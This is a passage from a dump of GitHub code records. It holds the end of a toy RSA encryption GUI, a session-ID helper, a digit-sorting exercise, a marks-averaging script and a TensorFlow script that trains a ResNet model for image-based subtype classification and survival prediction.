self.fast_pow(self.ciphertext, self.d, self.n)\r\n\r\n    def crt_decrypt(self):\r\n        try:\r\n            # print(self.val_N.toPlainText())\r\n            self.n = int(self.val_N_pri.toPlainText(), base=16)\r\n            self.d = int(self.val_D.toPlainText(), base=16)\r\n            self.p = int(self.val_P.toPlainText(), base=16)\r\n            self.q = int(self.val_Q.toPlainText(), 
base=16)\r\n            self.ciphertext = self.ciphertext_input.toPlainText()\r\n        except:\r\n            QMessageBox.warning(self, 'Notice', 'Please check the private key and plaintext', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\r\n            return\r\n\r\n        if self.ciphertext == '':\r\n            QMessageBox.warning(self, 'Notice', 'Please enter the ciphertext', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\r\n            return\r\n\r\n        start = time.time()\r\n        c_list = self.ciphertext_input.toPlainText().split('\\n')\r\n        # print(c_list)\r\n        m = ''\r\n        # print(self.n)\r\n        # print(self.d)\r\n        for i in range(len(c_list) - 1):\r\n            try:\r\n                m_slice = (fast_pow(int(c_list[i][12:-13], base=16) % self.q, self.d % (self.q - 1), self.q) *\r\n                           self.p * inverse(self.p, self.q) +\r\n                           fast_pow(int(c_list[i][12:-13], base=16) % self.p, self.d % (self.p - 1), self.p) *\r\n                           self.q * inverse(self.q, self.p)) % self.n\r\n                # print('m_slice: ', m_slice)\r\n                m += m_slice.to_bytes(((m_slice.bit_length() + 7) // 8), byteorder=\"big\").decode(\"utf-8\")\r\n            except:\r\n                QMessageBox.warning(self, 'Notice', 'Please check that the ciphertext is correct', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\r\n                return\r\n\r\n        self.ciphertext_input.setText(m)\r\n        self.de_time.setText(str(round(time.time() - start, 4)) + 's')\r\n        # return (fast_pow(self.ciphertext % self.q, self.d % (self.q - 1), self.q) *\r\n        #         self.p * self.inverse(self.p, self.q) +\r\n        #         fast_pow(self.ciphertext % self.p, self.d % (self.p - 1), self.p) *\r\n        #         self.q * self.inverse(self.q, self.p)) % self.n\r\n\r\n\r\nif __name__ == '__main__':\r\n    app = QApplication(sys.argv)\r\n    myWin = MyMainForm()\r\n    myWin.show()\r\n    sys.exit(app.exec_())\r\n\r\n    # print('Generate Key...')\r\n    # start = time.time()\r\n    # n, e, d, p, q = generate_key(1024, 5)\r\n    # print(time.time() - start)\r\n    #\r\n    # m = 'test'\r\n    # c = ''\r\n    # m_list = []\r\n    # c_list = []\r\n    #\r\n    # print('Encryption...')\r\n    # start = time.time()\r\n    # for i in range(-(-len(m) // 20)):\r\n    #     m_slice = int.from_bytes(m[20 * i: 20 * (i + 1)].encode(\"utf-8\"), byteorder=\"big\")\r\n    #     c_slice = encrypt(m_slice, e, n)\r\n    #     # print(c_slice)\r\n    #     c_list.append(c_slice)\r\n    #     c += '<ciphertext>' + str(hex(int(c_slice))) + '</ciphertext>\\n'\r\n    #\r\n    # print(time.time() - start)\r\n    #\r\n    # print('Decryption:')\r\n    # start = time.time()\r\n    # c_list = c.split('\\n')\r\n    # m = ''\r\n    # for i in range(len(c_list) - 1):\r\n    #     m_slice = decrypt(int(c_list[i][12:-13], base=0), d, n)\r\n    #     m += m_slice.to_bytes(((m_slice.bit_length() + 7) // 8), byteorder=\"big\").decode(\"utf-8\")\r\n    #\r\n    # print(time.time() - start)\r\n    # print(m)\r\n    #\r\n    # print('Decryption with CRT:')\r\n    # start = time.time()\r\n    # c_list = c.split('\\n')\r\n    # m = ''\r\n    # for i in range(len(c_list) - 1):\r\n    #     m_slice = crt_decrypt(int(c_list[i][12:-13], base=0), d, n, p, q)\r\n    #     m += m_slice.to_bytes(((m_slice.bit_length() + 7) // 8), byteorder=\"big\").decode(\"utf-8\")\r\n    #\r\n    # print(time.time() - start)\r\n    # print(m)\r\n","repo_name":"Aiemu/naiveRSA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"43292661864","text":"__all__ = (\"Session\",\"session_info\")\n\n\ndef session_info(environ):\n    return {\n        \"ip\": (environ.get(\"REMOTE_ADDR\", \"\"), environ.get(\"REMOTE_HOST\", \"\")),\n        \"agent\": environ.get(\"HTTP_USER_AGENT\", ())\n    }\n\n\ndef hex36(num):\n    key = '0123456789abcdefghijklmnopqrstuvwxyz'\n    a = []\n    while num >= 1:\n        a.append(key[int(num % 36)])\n        num = num / 36\n    a.reverse()\n    out = ''.join(a)\n    return out\n\n\nclass Session(dict):\n    @property\n    def sid(self):\n        return hex36(id(self))\n\n\nif __name__ == '__main__':\n    s1 = Session()\n    s1[\"1\"] = 1\n    s2 = 
Session()\n    s3 = Session()\n\n    print(s1, s1.sid)\n    print(s2, s2.sid)\n    print(s3, s3.sid)\n","repo_name":"zhzLuke96/Yoi","sub_path":"yoi/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9635669630","text":"n = input()\nresult = list()\nfor i in n:\n    result.append(int(i))\nresult.sort(reverse=True)\nfor i in result:\n    print(i, end='')\n\n'''\n# check each digit from 9 down to 0\narray = input()\nfor i in range(9, -1, -1):\n    for j in array:\n        if int(j) == i:\n            print(i, end='')\n'''","repo_name":"annahxxl/algorithm-study","sub_path":"problem-solving/boj/etc/소트인사이드_1427.py","file_name":"소트인사이드_1427.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8070463541","text":"\nclass Marks():\n    def ReadFile(self, filename):\n        Students = dict()\n        Math = dict()\n        Language = dict()\n        f = open(filename, \"r\")\n        lines = []\n        final = []\n        for line in f:\n            lines.append(line)\n        subject = lines[0]\n        for i in lines[1:]:\n            final.append(i)\n        str1 = ''.join(final)\n        Students = dict((str(x.strip()), int(y.strip())) for x, y in (i.split('-') for i in str1.split('\\n')))\n        if subject==\"Math\\n\":\n            Math = dict(Students)\n            return Math \n        elif subject == \"Language\\n\":\n            Language = dict(Students)\n            return Language\n    \n    def ReadMaks_and_CountAvarage(self,filename1,filename2):\n        Total = {}\n        Math = self.ReadFile(filename1)\n        Language = self.ReadFile(filename2)\n        result = open('C:/Users/OChernovolyk/Desktop/Teachers_Reports/Teachers_Reports/bin/Debug/final.txt', \"w\")\n        result.write(\"Avarage\" + '\\n')\n\n        for d in Math, Language:\n            for k, v in d.items():\n                if Total.get(k) is None:\n                    Total[k] = []\n                if v not in Total.get(k):\n                    Total[k].append(v)\n        for d in Total.keys():\n            l = len(Total[d])\n            if l < 2:\n                Av = (Total[d][0] + 0)/2\n            else:\n                Av = (Total[d][0] + Total [d][1])/2\n            result.write(d +\" \"+ \"-\" +\" \"+ str(Av)+ '\\n')\n        result.close()\ns = Marks( )\ns.ReadMaks_and_CountAvarage('C:/Users/OChernovolyk/Desktop/Teachers_Reports/Teachers_Reports/bin/Debug/subject1.txt', 'C:/Users/OChernovolyk/Desktop/Teachers_Reports/Teachers_Reports/bin/Debug/subject2.txt')\n\n\n\n    \n","repo_name":"ElenQa/PythonApplication1","sub_path":"PythonApplication1/PythonApplication1.py","file_name":"PythonApplication1.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14381233129","text":"#!/usr/bin/env python \r\n# -*- coding: utf-8 -*- \r\n# @Time : 6/1/2021 1:56 PM \r\n# @Author : Zhicheng Zhang \r\n# @E-mail : zhicheng0623@gmail.com\r\n# @Site : \r\n# @File : Train.py \r\n# @Software: PyCharm\r\n\r\nimport numpy as np\r\nimport os\r\nimport sys\r\n\r\nsys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'utils'))\r\n\r\nimport warnings\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\nimport tensorflow as tf\r\nimport datetime, time\r\nimport utils.ckpt as ckpt\r\nimport random\r\nimport copy\r\nfrom ops import *\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import precision_score, recall_score, f1_score, roc_auc_score\r\n\r\n\r\n\r\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'  # or any {'0', '1', '2'}\r\nos.environ['TF_ENABLE_AUTO_MIXED_PRECISION'] = 
'1'\r\n\r\n\r\nfrom numpy.random import seed\r\n\r\nseed(1)\r\nfrom tensorflow import set_random_seed\r\n\r\nset_random_seed(2)\r\nfrom imgaug import augmenters as iaa\r\n\r\naug90 = iaa.Sometimes(1, iaa.Affine(rotate=(-90, -90),mode=\"constant\",cval=(-1000,-1000)))\r\naug180 = iaa.Sometimes(1, iaa.Affine(rotate=(-180, -180),mode=\"constant\",cval=(-1000,-1000)))\r\naug270 = iaa.Sometimes(1, iaa.Affine(rotate=(-270, -270),mode=\"constant\",cval=(-1000,-1000)))\r\naugFlip1 = iaa.Sometimes(1, iaa.Fliplr(1))\r\naugFlip2 = iaa.Sometimes(1, iaa.Flipud(1))\r\naugCon= iaa.Sometimes(1, iaa.ContrastNormalization(0.5, 0.9))\r\naugBlur = iaa.Sometimes(1, iaa.GaussianBlur(sigma=(0.0, 0.8)))\r\naugSharpen = iaa.Sometimes(1, iaa.Sharpen(alpha=0.1, lightness=0.7))\r\n\r\nIx = Iy = 160\r\ndef augmentHK(image,k):\r\n w1 = image.reshape(image.shape[0], image.shape[1])\r\n # k = random.randrange(1, 7)\r\n global w2\r\n if k == 1:\r\n w2 = iaa.Sometimes(1, iaa.Affine(\r\n scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)},\r\n translate_percent={\"x\": (-0.2, 0.2), \"y\": (-0.2, 0.2)},\r\n rotate=(-180, 180)\r\n ,mode=\"constant\",cval=(0,0)\r\n )).augment_image(w1)\r\n elif k == 2:\r\n w2 = augFlip1.augment_image(w1)\r\n elif k == 3:\r\n w2 = augFlip2.augment_image(w1)\r\n elif k == 4:\r\n w2 = augCon.augment_image(w1)\r\n elif k == 5:\r\n w2 = augBlur.augment_image(w1)\r\n elif k == 6:\r\n w2 = augSharpen.augment_image(w1)\r\n else:\r\n w2 = w1\r\n w3 = w2.reshape( w2.shape[0], w2.shape[1])\r\n w4 = np.array(w3)\r\n return w4\r\naug = 6\r\n\r\n\r\n\r\nclass model(object):\r\n def __init__(self):\r\n self.w_init = tf.random_normal_initializer(mean=0.0, stddev=0.05)\r\n self.reg = tf.contrib.layers.l2_regularizer(scale=0.1)\r\n self.param = {}\r\n self.param['retrain'] = True\r\n\r\n self.param['model_save_path'] = os.path.join('./Results', os.path.basename(__file__).split('.')[0], 'model')\r\n self.param['tensorboard_save_logs'] = os.path.join('./logs', os.path.basename(__file__).split('.')[0])\r\n\r\n def _l2normalize(self, v, eps=1e-12):\r\n with tf.name_scope('l2normalize'):\r\n return v / (tf.reduce_sum(v ** 2) ** 0.5 + eps)\r\n\r\n def global_avg_pooling(self, x):\r\n gap = tf.reduce_mean(x, axis=[1, 2])\r\n return gap\r\n\r\n\r\n\r\n def swish(self, x):\r\n return x * tf.nn.sigmoid(x)\r\n\r\n def cox_loss(self, score, time_value, event):\r\n '''\r\n Args\r\n score: \t\tpredicted survival time_value, tf tensor of shape (None, 1)\r\n time_value:\t\ttrue survival time_value, tf tensor of shape (None, )\r\n event:\t\tevent, tf tensor of shape (None, )\r\n Return\r\n loss:\t\tpartial likelihood of cox regression\r\n '''\r\n\r\n ## cox regression computes the risk score, we want the opposite\r\n score = -score\r\n\r\n ## find index i satisfying event[i]==1\r\n ix = tf.where(tf.cast(event, tf.bool)) # shape of ix is [None, 1]\r\n\r\n ## sel_mat is a matrix where sel_mat[i,j]==1 where time_value[i]<=time_value[j]\r\n sel_mat = tf.cast(tf.gather(time_value, ix) <= time_value, tf.float32)\r\n\r\n ## formula: \\sum_i[s_i-\\log(\\sum_j{e^{s_j}})] where time_value[i]<=time_value[j] and event[i]==1\r\n p_lik = tf.gather(score, ix) - tf.log(tf.reduce_sum(sel_mat * tf.transpose(tf.exp(score)), axis=-1))\r\n # p_lik = tf.gather(score, ix) - tf.log(tf.reduce_sum(tf.transpose(tf.exp(score)), axis=-1))\r\n loss = -tf.reduce_mean(p_lik)\r\n\r\n return loss\r\n\r\n def hinge_loss(self, score, time_value, event):\r\n '''\r\n Args\r\n score:\t \tpredicted score, tf tensor of shape (None, 1)\r\n time_value:\t\ttrue survival 
time_value, tf tensor of shape (None, )\r\n event:\t\tevent, tf tensor of shape (None, )\r\n '''\r\n ## find index pairs (i,j) satisfying time_value[i]<time_value[j] and event[i]==1\r\n ix = tf.where(tf.logical_and(tf.expand_dims(time_value, axis=-1) < time_value,\r\n tf.expand_dims(tf.cast(event, tf.bool), axis=-1)), name='ix')\r\n ## if score[i]>score[j], incur hinge loss\r\n s1 = tf.gather(score, ix[:, 0])\r\n s2 = tf.gather(score, ix[:, 1])\r\n loss = tf.reduce_mean(tf.maximum(1 + s1 - s2, 0.0), name='loss')\r\n\r\n return loss\r\n\r\n def log_loss(self, score, time_value, event):\r\n '''\r\n Args\r\n score: \tpredicted survival time_value, tf tensor of shape (None, 1)\r\n time_value:\t\ttrue survival time_value, tf tensor of shape (None, )\r\n event:\t\tevent, tf tensor of shape (None, )\r\n '''\r\n ## find index pairs (i,j) satisfying time_value[i]<time_value[j] and event[i]==1\r\n ix = tf.where(tf.logical_and(tf.expand_dims(time_value, axis=-1) < time_value,\r\n tf.expand_dims(tf.cast(event, tf.bool), axis=-1)), name='ix')\r\n ## if score[i]>score[j], incur log loss\r\n s1 = tf.gather(score, ix[:, 0])\r\n s2 = tf.gather(score, ix[:, 1])\r\n loss = tf.reduce_mean(tf.log(1 + tf.exp(s1 - s2)), name='loss')\r\n return loss\r\n\r\n def __concordance_index(self, score, time_value, event):\r\n '''\r\n Args\r\n score: \t\tpredicted score, tf tensor of shape (None, )\r\n time_value:\t\ttrue survival time_value, tf tensor of shape (None, )\r\n event:\t\tevent, tf tensor of shape (None, )\r\n '''\r\n\r\n ## find index pairs (i,j) satisfying time_value[i]<time_value[j] and event[i]==1\r\n ix = tf.where(tf.logical_and(tf.expand_dims(time_value, axis=-1) < time_value,\r\n tf.expand_dims(tf.cast(event, tf.bool), axis=-1)), name='ix')\r\n\r\n ## count how many score[i]<score[j]\r\n s1 = tf.gather(score, ix[:, 0])\r\n s2 = tf.gather(score, ix[:, 1])\r\n ci = tf.reduce_mean(tf.cast(s1 < s2, tf.float32), name='c_index')\r\n\r\n return ci\r\n def ResNet18(self,x,w_init=None, drop= 0,norm=None,is_training=True,name='res50'):\r\n with tf.variable_scope(name, reuse=tf.AUTO_REUSE):\r\n ch = 64\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[7, 7], padding='SAME', strides=[2, 2],kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n conv = tf.layers.max_pooling2d(x, pool_size=[3, 3], strides=[2, 2], padding='SAME')\r\n\r\n for i in range(2):\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], padding='SAME',kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + conv)\r\n\r\n ch *= 2\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], strides=[2,2],padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + tf.layers.conv2d(conv, 
filters=ch, kernel_size=[1, 1], strides=[2,2],padding='SAME',kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training))\r\n\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + conv)\r\n\r\n ch *= 2\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], padding='SAME',strides=[2,2], kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + tf.layers.conv2d(conv, filters=ch, kernel_size=[1, 1], strides=[2,2],padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training))\r\n\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + conv)\r\n\r\n ch *= 2\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], strides=[2,2],padding='SAME', kernel_initializer=w_init,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + tf.layers.conv2d(conv, filters=ch, kernel_size=[1, 1], strides=[2,2],padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training))\r\n\r\n x = tf.layers.conv2d(conv, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n if norm != None:\r\n x = norm(x)\r\n x = tf.nn.leaky_relu(x)\r\n\r\n x = tf.layers.conv2d(x, filters=ch, kernel_size=[3, 3], padding='SAME', kernel_initializer=w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n x = tf.layers.dropout(x, rate=drop)\r\n conv = tf.nn.leaky_relu(x + conv)\r\n\r\n feature = self.global_avg_pooling(conv)\r\n return feature\r\n\r\n def model(self, is_training = True,name='model'):\r\n\r\n with tf.variable_scope(name, reuse=tf.AUTO_REUSE):\r\n x = tf.concat(tf.split(self.x, num_or_size_splits=5, axis=-1), axis=0)\r\n x = self.ResNet18(x,w_init=self.w_init,norm=None,drop=self.drop,is_training=is_training)\r\n x = tf.concat(tf.split(tf.expand_dims(x,axis=1), num_or_size_splits=5, axis=0), axis=1)\r\n\r\n x = tf.layers.dense(x, 256, 
kernel_initializer=self.w_init,activation=tf.nn.leaky_relu,kernel_regularizer=self.reg,trainable=is_training)\r\n            # x = self.swish(x)\r\n\r\n            feature = tf.layers.dense(x, 256, kernel_initializer=self.w_init,activation=tf.nn.leaky_relu,kernel_regularizer=self.reg,trainable=is_training) #80*256\r\n            # feature = self.swish(feature)\r\n\r\n            a = tf.layers.dense(feature, 256, kernel_initializer=self.w_init,activation=tf.nn.tanh,kernel_regularizer=self.reg,trainable=is_training)\r\n            # a = self.swish(a)\r\n            b = tf.layers.dense(feature, 256, kernel_initializer=self.w_init,activation=tf.nn.sigmoid,kernel_regularizer=self.reg,trainable=is_training)\r\n\r\n            A = tf.multiply(a,b)\r\n            A = tf.layers.dense(A, 2, kernel_initializer=self.w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n            A = tf.nn.softmax(tf.transpose(A,perm=[0,2,1]))\r\n            M = tf.matmul(A,feature) #2*256\r\n\r\n\r\n        with tf.variable_scope('ISP', reuse=tf.AUTO_REUSE):\r\n            # logit = tf.layers.dense(M[:,0], 128, kernel_initializer=self.w_init,trainable=is_training,activation=tf.nn.leaky_relu)\r\n            logit = tf.layers.dense(M[:,0], 4, kernel_initializer=self.w_init,kernel_regularizer=self.reg,trainable=is_training)\r\n\r\n        with tf.variable_scope('survival', reuse=tf.AUTO_REUSE):\r\n            s = tf.layers.dense(tf.concat([M[:,1], tf.nn.softmax(logit)], axis=-1), 1, kernel_initializer=self.w_init,kernel_regularizer=self.reg,activation=tf.nn.leaky_relu)\r\n            s = tf.layers.dense(s, 1, kernel_initializer=self.w_init,kernel_regularizer=self.reg)\r\n            # s = tf.layers.dense(M[:,0], 1, kernel_initializer=self.w_init)\r\n\r\n        return logit, s\r\n\r\n    def train(self):\r\n        n_epochs = 20000\r\n        checkpointdir = self.param['model_save_path']\r\n        ####################################################################################\r\n        if not os.path.exists(checkpointdir):\r\n            checkpoints_dir = checkpointdir\r\n            os.makedirs(checkpoints_dir)\r\n        else:\r\n            current_time = datetime.datetime.now().strftime(\"%Y%m%d-%H%M\")\r\n            checkpoints_dir = checkpointdir.format(current_time)\r\n        ####################################################################################\r\n        # Read the filename of Training dataset\r\n        self.param['batchsize'] = 16\r\n\r\n        ##################################################################\r\n        train_data = np.load('./Dataset/Resize_data/Training.npy',allow_pickle=True)\r\n\r\n        # np.zeros (rather than np.empty) so the samples skipped below stay\r\n        # zero-filled instead of holding uninitialized memory\r\n        train_img = np.zeros([np.uint16(len(train_data)), 160, 160, 5], dtype=np.float32)\r\n        train_ISP = np.zeros([np.uint16(len(train_data)), 4], dtype=np.float32)\r\n        train_DFS = np.zeros([np.uint16(len(train_data))], dtype=np.float32)\r\n        train_st = np.zeros([np.uint16(len(train_data))], dtype=np.float32)\r\n\r\n        for i in range(np.uint16(len(train_data))):\r\n            if i == 93 or i == 262 or i == 180:\r\n                continue\r\n            else:\r\n                train_img[i, :, :, :] = train_data[i]['img']\r\n                if train_data[i]['ISP'][0] == 1:\r\n                    train_ISP[i, :] = [1, 0, 0, 0]\r\n                elif train_data[i]['ISP'][0] == 2:\r\n                    train_ISP[i, :] = [0, 1, 0, 0]\r\n                elif train_data[i]['ISP'][0] == 3:\r\n                    train_ISP[i, :] = [0, 0, 1, 0]\r\n                elif train_data[i]['ISP'][0] == 4:\r\n                    train_ISP[i, :] = [0, 0, 0, 1]\r\n\r\n                # plt.imshow(train_img[i, :, :, 2])\r\n                # plt.title(str(i))\r\n                # plt.pause(.1)\r\n\r\n                train_DFS[i] = train_data[i]['DFS'][0]\r\n                train_st[i] = train_data[i]['st'][0]\r\n\r\n        
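# Augmentation: each original volume is kept once and `aug` randomly\r\n        # transformed copies are appended; the same transform index k is reused\r\n        # for all five slices of a volume so the channels stay aligned.\r\n        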
aug_bool = 1\r\n        if aug_bool:\r\n            train_img_aug = np.empty([np.shape(train_img)[0] * (1 + aug), Ix, Iy, 5], dtype=np.float32)\r\n            train_ISP_aug = np.empty([np.shape(train_img)[0] * (1 + aug), 4], dtype=np.float32)\r\n            train_DFS_aug = np.empty([np.shape(train_img)[0] * (1 + aug)], dtype=np.float32)\r\n            train_st_aug = np.empty([np.shape(train_img)[0] * (1 + aug)], dtype=np.float32)\r\n\r\n            iter = 0\r\n            for i in range(np.shape(train_img)[0]):\r\n                train_img_aug[iter, :, :, :] = train_img[i, :, :, :]\r\n                train_ISP_aug[iter, :] = train_ISP[i, :]\r\n                train_DFS_aug[iter] = train_DFS[i]\r\n                train_st_aug[iter] = train_st[i]\r\n                iter += 1\r\n                for ii in range(aug):\r\n                    k = random.randrange(1, 7)\r\n                    for jj in range(5):\r\n                        random_augmented_image = np.array(augmentHK(train_img[i, :, :, jj], k), dtype=np.float32)\r\n                        train_img_aug[iter, :, :, jj] = random_augmented_image\r\n                    train_ISP_aug[iter, :] = train_ISP[i, :]\r\n                    train_DFS_aug[iter] = train_DFS[i]\r\n                    train_st_aug[iter] = train_st[i]\r\n                    iter += 1\r\n        else:\r\n            train_img_aug = train_img\r\n            train_ISP_aug = train_ISP\r\n            train_DFS_aug = train_DFS\r\n            train_st_aug = train_st\r\n\r\n        ##################################################################\r\n        valid_data = np.load('./Dataset/Resize_data/Validation.npy',allow_pickle=True)\r\n        # np.zeros again so the sample skipped below stays zero-filled\r\n        valid_img = np.zeros([np.uint16(len(valid_data)), 160, 160, 5], dtype=np.float32)\r\n        valid_ISP = np.zeros([np.uint16(len(valid_data)), 4], dtype=np.float32)\r\n        valid_DFS = np.zeros([np.uint16(len(valid_data))], dtype=np.float32)\r\n        valid_st = np.zeros([np.uint16(len(valid_data))], dtype=np.float32)\r\n\r\n        for i in range(np.uint16(len(valid_data))):\r\n            if i == 124:\r\n                continue\r\n            else:\r\n                valid_img[i, :, :, :] = valid_data[i]['img']\r\n\r\n                if valid_data[i]['ISP'][0] == 1:\r\n                    valid_ISP[i, :] = [1, 0, 0, 0]\r\n                elif valid_data[i]['ISP'][0] == 2:\r\n                    valid_ISP[i, :] = [0, 1, 0, 0]\r\n                elif valid_data[i]['ISP'][0] == 3:\r\n                    valid_ISP[i, :] = [0, 0, 1, 0]\r\n                elif valid_data[i]['ISP'][0] == 4:\r\n                    valid_ISP[i, :] = [0, 0, 0, 1]\r\n\r\n                valid_DFS[i] = valid_data[i]['DFS'][0]\r\n                valid_st[i] = valid_data[i]['st'][0]\r\n\r\n        #####################################################################################\r\n\r\n        graph = tf.Graph()\r\n        with graph.as_default():\r\n            config = tf.ConfigProto()\r\n            config.gpu_options.allow_growth = True\r\n            ####################################################################################\r\n            self.x = tf.placeholder(tf.float32, [self.param['batchsize'], 160, 160, 5])\r\n            self.ISP = tf.placeholder(tf.float32, [self.param['batchsize'], 4])\r\n            self.DFS = tf.placeholder(tf.float32, [self.param['batchsize']])\r\n            self.st = tf.placeholder(tf.float32, [self.param['batchsize']])\r\n\r\n            self.epoch = tf.placeholder(tf.uint16)\r\n            self.is_training = tf.placeholder(tf.bool)\r\n            self.drop = tf.placeholder(tf.float32)\r\n\r\n            ####################################################################################\r\n\r\n            logit, s = self.model(name='model',is_training=True)\r\n\r\n            ####################################################################################\r\n\r\n            gene_4_cls_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=self.ISP, logits=logit))\r\n\r\n            score = s\r\n            time_value = self.DFS\r\n            event = self.st\r\n            cox_value = self.cox_loss(score, time_value, event)\r\n\r\n            loss = gene_4_cls_loss + 1*cox_value\r\n\r\n            ci = self.__concordance_index(s, self.DFS, self.st)\r\n            ####################################################################################\r\n\r\n            global_step = tf.Variable(0, trainable=False)\r\n            self.g_lr = tf.train.polynomial_decay(learning_rate=0.00005, global_step=global_step, decay_steps=500,end_learning_rate=1e-5, power=0.5, cycle=False)\r\n\r\n            
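# Use Adam (matching the attribute name below) with the decayed learning\r\n            # rate; global_step is passed to minimize() so the schedule advances.\r\n            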
self.ADAM_opt = tf.train.AdamOptimizer(learning_rate=self.g_lr).minimize(loss, global_step=global_step)\r\n\r\n        ####################################################################################\r\n        if os.path.exists('Validation.txt') and self.param['retrain']:\r\n            os.remove('Validation.txt')\r\n        if os.path.exists('Training.txt') and self.param['retrain']:\r\n            os.remove('Training.txt')\r\n        ####################################################################################\r\n        with tf.Session(config=config, graph=graph) as sess:\r\n            sess.run(tf.global_variables_initializer())\r\n            ####################################################################################\r\n            # Restore an existing model\r\n            if not self.param['retrain']:\r\n                checkpoint = tf.train.get_checkpoint_state(checkpoints_dir)\r\n                meta_graph_path = checkpoint.model_checkpoint_path + \".meta\"\r\n                ckpt.load_ckpt(sess=sess, save_dir=checkpoints_dir, is_latest=True)\r\n                epoch_pre = int(meta_graph_path.split(\"-\")[1].split(\".\")[0])\r\n            else:\r\n                # variables were already initialized above; start from epoch 0\r\n                epoch_pre = 0\r\n            ####################################################################################\r\n            valid_target_all = np.zeros(\r\n                (self.param['batchsize'] * (np.shape(valid_data)[0] // self.param['batchsize']), 4),\r\n                dtype=np.float32)\r\n            valid_pprob_all = np.zeros(\r\n                (self.param['batchsize'] * (np.shape(valid_data)[0] // self.param['batchsize']), 4),\r\n                dtype=np.float32)\r\n\r\n            train_target_all = np.zeros(\r\n                (self.param['batchsize'] * (np.shape(train_data)[0] // self.param['batchsize']), 4),\r\n                dtype=np.float32)\r\n            train_pprob_all = np.zeros(\r\n                (self.param['batchsize'] * (np.shape(train_data)[0] // self.param['batchsize']), 4),\r\n                dtype=np.float32)\r\n            